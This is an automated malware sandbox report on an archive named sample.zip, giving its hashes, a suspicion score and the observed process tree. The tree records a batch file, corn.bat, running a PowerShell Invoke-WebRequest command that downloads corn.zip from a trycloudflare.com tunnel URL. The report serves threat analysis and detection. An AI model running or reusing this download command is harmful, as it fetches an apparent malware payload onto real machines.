Analysis

  • max time kernel
    1563s
  • max time network
    1565s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    26-09-2024 13:58

General

  • Target

    sample.zip

  • Size

    42.8MB

  • MD5

    7579c349d3f04d81d16020218b4b014e

  • SHA1

    7299091625d2af8508e6c3e07e236ee47ac4400a

  • SHA256

    0366ac31796c460c24e7d71469e86f4c7e9509f3b52f4c24921d19d7b5786f16

  • SHA512

    6e7a4f071e8c74686d18892768e8158d00fba5bebad9bd0947374b08b79b7b0fa87f756618ad80ba5728db71db42a556fad990066f9d87232c0c2e35d00e3e94

  • SSDEEP

    786432:oDXXuerfHkIZf06hLwbl9Pm2TW38ZF+oxwk4fbSep82zpMN8:oDnXfHkIZcXM2TdZooxwnXWN8

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\sample.zip
    1⤵
      PID:1984
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      1⤵
        PID:1980
      • C:\Windows\system32\AUDIODG.EXE
        C:\Windows\system32\AUDIODG.EXE 0x4e4
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:912
      • C:\Windows\system32\cmd.exe
        cmd /c ""C:\Users\Admin\Documents\sample\corn.bat" "
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://myspace-step-singh-headers.trycloudflare.com/corn.zip' -OutFile 'C:\Users\Admin\Downloads\corn.zip' } catch { exit 1 }"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1652
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://myspace-step-singh-headers.trycloudflare.com/corn.zip' -OutFile 'C:\Users\Admin\Downloads\corn.zip' } catch { exit 1 }"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1508

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        43139d7fa5f8f17cb66e698b3ab40005

        SHA1

        ec9c2e3cc0ee7e0e2136dc96bd4402b461b8a64a

        SHA256

        7fd312245c16a943b83fab4698b6753fefb5a3a55e7b0fa6ff3fdfc6e1d93454

        SHA512

        3faf3801996afb60ad0d245fec488a5e96db8e3c4addf5c6a3a12f3053ad906a10ecb90fa7767b401081715493d993070df8e3fb8653e7cc7713eba14b34a568

      • memory/1508-11-0x000000001B680000-0x000000001B962000-memory.dmp

        Filesize

        2.9MB

      • memory/1508-12-0x00000000021E0000-0x00000000021E8000-memory.dmp

        Filesize

        32KB

      • memory/1652-4-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

        Filesize

        2.9MB

      • memory/1652-5-0x0000000002960000-0x0000000002968000-memory.dmp

        Filesize

        32KB